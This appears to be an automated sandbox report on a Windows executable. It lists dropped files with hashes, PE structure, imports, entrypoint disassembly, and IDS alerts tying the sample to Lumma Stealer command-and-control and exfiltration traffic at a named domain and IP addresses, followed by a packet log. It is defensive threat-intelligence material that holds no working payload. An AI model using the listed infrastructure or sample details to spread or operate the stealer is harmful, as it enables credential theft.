                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):35616
                                                                                                                  Entropy (8bit):6.953519176025623
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\is-V3A6I.tmp\_isetup\_setup64.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6144
                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):846325235
                                                                                                                  Entropy (8bit):0.13954043794048707
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:
                                                                                                                  MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                  SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                  SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                  SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Roaming\ColorStreamLib\is-CNRVF.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):846325235
                                                                                                                  Entropy (8bit):0.13954043794048707
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:
                                                                                                                  MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                  SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                  SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                  SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                  Entropy (8bit):6.143535347451681
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.73%
                                                                                                                  • Winzip Win32 self-extracting archive (generic) (23002/1) 0.23%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:MdhO83N5Fm.exe
                                                                                                                  File size:33'189'377 bytes
                                                                                                                  MD5:9fed7135d164c0fb31b859fcd5acfe5f
                                                                                                                  SHA1:ae768d9bbcc5d8bf4ef85797ccea78c04ff53013
                                                                                                                  SHA256:183956d90281470170a3a7799259b92bee10bafcb90ebff5d4ad937d31f70c33
                                                                                                                  SHA512:f9432e405364445d46521b067427a06ecf8efa4fbb6e31da9036268ec7c650a0b7c7706192701b813813332f7960325f4a38aa00a64ae0e40d31561743640766
                                                                                                                  SSDEEP:196608:9pBAJH9GObp2lxc9ohPVUHBtDIzMnPBEIeTLCHDJHGzFeEUuFFFFFFFFFFFFFFFN:hA4cqIhtDIwnp0TL2JmAEUYJ0W
                                                                                                                  TLSH:9A772A95F99B01F5EA030830546B626F23322E054B29CBC7F60CBF66EB379E21977159
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................P....@..........................P............@................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:29226ee6b692c62f

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x46e6b0
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:6
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:6
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:6
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:ff9f3a86709796c17211f9df12aae74d

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp 00007FB9C082E380h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                  sub esp, 28h
                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                  mov dword ptr [esp+10h], ebp
                                                                                                                  mov dword ptr [esp+14h], esi
                                                                                                                  mov dword ptr [esp+18h], edi
                                                                                                                  mov esi, eax
                                                                                                                  mov edx, dword ptr fs:[00000014h]
                                                                                                                  cmp edx, 00000000h
                                                                                                                  jne 00007FB9C08306F9h
                                                                                                                  mov eax, 00000000h
                                                                                                                  jmp 00007FB9C0830756h
                                                                                                                  mov edx, dword ptr [edx+00000000h]
                                                                                                                  cmp edx, 00000000h
                                                                                                                  jne 00007FB9C08306F7h
                                                                                                                  call 00007FB9C08307E9h
                                                                                                                  mov dword ptr [esp+20h], edx
                                                                                                                  mov dword ptr [esp+24h], esp
                                                                                                                  mov ebx, dword ptr [edx+18h]
                                                                                                                  mov ebx, dword ptr [ebx]
                                                                                                                  cmp edx, ebx
                                                                                                                  je 00007FB9C083070Ah
                                                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                                                  mov dword ptr [ebp+00000000h], ebx
                                                                                                                  mov edi, dword ptr [ebx+1Ch]
                                                                                                                  sub edi, 28h
                                                                                                                  mov dword ptr [edi+24h], esp
                                                                                                                  mov esp, edi
                                                                                                                  mov ebx, dword ptr [ecx]
                                                                                                                  mov ecx, dword ptr [ecx+04h]
                                                                                                                  mov dword ptr [esp], ebx
                                                                                                                  mov dword ptr [esp+04h], ecx
                                                                                                                  mov dword ptr [esp+08h], edx
                                                                                                                  call esi
                                                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                                                  mov esp, dword ptr [esp+24h]
                                                                                                                  mov edx, dword ptr [esp+20h]
                                                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                                                  mov dword ptr [ebp+00000000h], edx
                                                                                                                  mov edi, dword ptr [esp+18h]
                                                                                                                  mov esi, dword ptr [esp+14h]
                                                                                                                  mov ebp, dword ptr [esp+10h]
                                                                                                                  mov ebx, dword ptr [esp+1Ch]
                                                                                                                  add esp, 28h
                                                                                                                  retn 0004h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                  mov edx, dword ptr [ecx]
                                                                                                                  mov eax, esp

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1f030000x410.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1fce0000x6ab8.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1f040000xc8a1c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1cf7b400xa8.data
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000xd986150xd98800ad37d38e33e4f372f63a204b56a098adunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0xd9a0000xf5a6c80xf5a800dc90403e725a47712640992ab2bf3ac3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x1cf50000x20d7cc0x1c3a00bdc87999f8d0596f6c3048e97ca9f952unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .idata0x1f030000x4100x6009e21724a2bc78e91e0a58cfeb737823cFalse0.3372395833333333data3.8695347505030155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .reloc0x1f040000xc8a1c0xc8c0044ac1543dea494cb82d6bb16c3636197False0.47762540862391034data6.619581658836037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                  .symtab0x1fcd0000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x1fce0000x6ab80x6c0041104ab5f558f7dee1fd6381c2984887False0.5325159143518519data5.980845646160816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0x1fce2680x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.3823170731707317
                                                                                                                  RT_ICON0x1fce8d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.5282258064516129
                                                                                                                  RT_ICON0x1fcebb80x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.6655405405405406
                                                                                                                  RT_ICON0x1fcece00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.6084754797441365
                                                                                                                  RT_ICON0x1fcfb880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.8172382671480144
                                                                                                                  RT_ICON0x1fd04300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.7276011560693642
                                                                                                                  RT_ICON0x1fd09980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.41358921161825724
                                                                                                                  RT_ICON0x1fd2f400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6672138836772983
                                                                                                                  RT_ICON0x1fd3fe80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.8324468085106383
                                                                                                                  RT_GROUP_ICON0x1fd44500x92dataEnglishUnited States0.589041095890411
                                                                                                                  RT_MANIFEST0x1fd44e40x5d4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.43029490616621985

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetThreadPriority, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateWaitableTimerA, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-29T08:55:44.072993+01002058428ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (simplerapplau .click)1192.168.2.5551061.1.1.153UDP
                                                                                                                  2024-12-29T08:55:45.724286+01002058429ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI)1192.168.2.549730172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:45.724286+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549730172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:46.519980+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549730172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:46.519980+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549730172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:47.958610+01002058429ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI)1192.168.2.549736172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:47.958610+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549736172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:48.801921+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549736172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:48.801921+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549736172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:50.293500+01002058429ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI)1192.168.2.549742172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:50.293500+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549742172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:54.726682+01002058429ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI)1192.168.2.549753172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:54.726682+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549753172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:55.648772+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549753172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:57.103190+01002058429ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI)1192.168.2.549759172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:57.103190+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549759172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:59.908522+01002058429ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI)1192.168.2.549765172.67.152.160443TCP
                                                                                                                  2024-12-29T08:55:59.908522+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549765172.67.152.160443TCP
                                                                                                                  2024-12-29T08:56:04.717398+01002058429ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI)1192.168.2.549776172.67.152.160443TCP
                                                                                                                  2024-12-29T08:56:04.717398+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549776172.67.152.160443TCP
                                                                                                                  2024-12-29T08:56:06.928220+01002058429ET MALWARE Observed Win32/Lumma Stealer Related Domain (simplerapplau .click in TLS SNI)1192.168.2.549782172.67.152.160443TCP
                                                                                                                  2024-12-29T08:56:06.928220+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549782172.67.152.160443TCP
                                                                                                                  2024-12-29T08:56:07.759783+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549782172.67.152.160443TCP
                                                                                                                  2024-12-29T08:56:09.928693+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549788185.161.251.21443TCP
                                                                                                                  2024-12-29T08:56:12.389676+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549796172.67.208.58443TCP
                                                                                                                  2024-12-29T08:56:13.293242+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.208.58443192.168.2.549796TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 29, 2024 08:55:44.457483053 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:44.457520008 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:44.457587957 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:44.459165096 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:44.459178925 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:45.722076893 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:45.724286079 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:45.728212118 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:45.728228092 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:45.728450060 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:45.776585102 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:45.776585102 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:45.776696920 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:46.519996881 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:46.520107031 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:46.520158052 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:46.525692940 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:46.525698900 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:46.525736094 CET49730443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:46.525741100 CET44349730172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:46.742345095 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:46.742398024 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:46.742492914 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:46.743412018 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:46.743428946 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:47.958472013 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:47.958610058 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:47.960671902 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:47.960680008 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:47.961003065 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:47.962182999 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:47.962213039 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:47.962275028 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.802000046 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.802211046 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.802293062 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.802346945 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:48.802372932 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.802423954 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:48.802429914 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.809947014 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.809998035 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:48.810005903 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.818279982 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.818371058 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.818417072 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:48.818425894 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.818506002 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:48.826679945 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.872319937 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:48.921236992 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.921550035 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:48.921900988 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:48.921952963 CET49736443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:48.921962023 CET44349736172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:49.080070972 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:49.080121040 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:49.080210924 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:49.080512047 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:49.080524921 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:50.293431044 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:50.293499947 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:50.295389891 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:50.295401096 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:50.295655966 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:50.296895981 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:50.297068119 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:50.297100067 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:53.337013006 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:53.337151051 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:53.337253094 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:53.337558031 CET49742443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:53.337575912 CET44349742172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:53.422558069 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:53.422590017 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:53.422658920 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:53.422947884 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:53.422959089 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:54.726612091 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:54.726681948 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:54.727873087 CET49753443192.168.2.5172.67.152.160
                                                                                                                  Dec 29, 2024 08:55:54.727880955 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:54.728322983 CET44349753172.67.152.160192.168.2.5
                                                                                                                  Dec 29, 2024 08:55:54.729547977 CET49753443192.168.2.5172.67.152.160
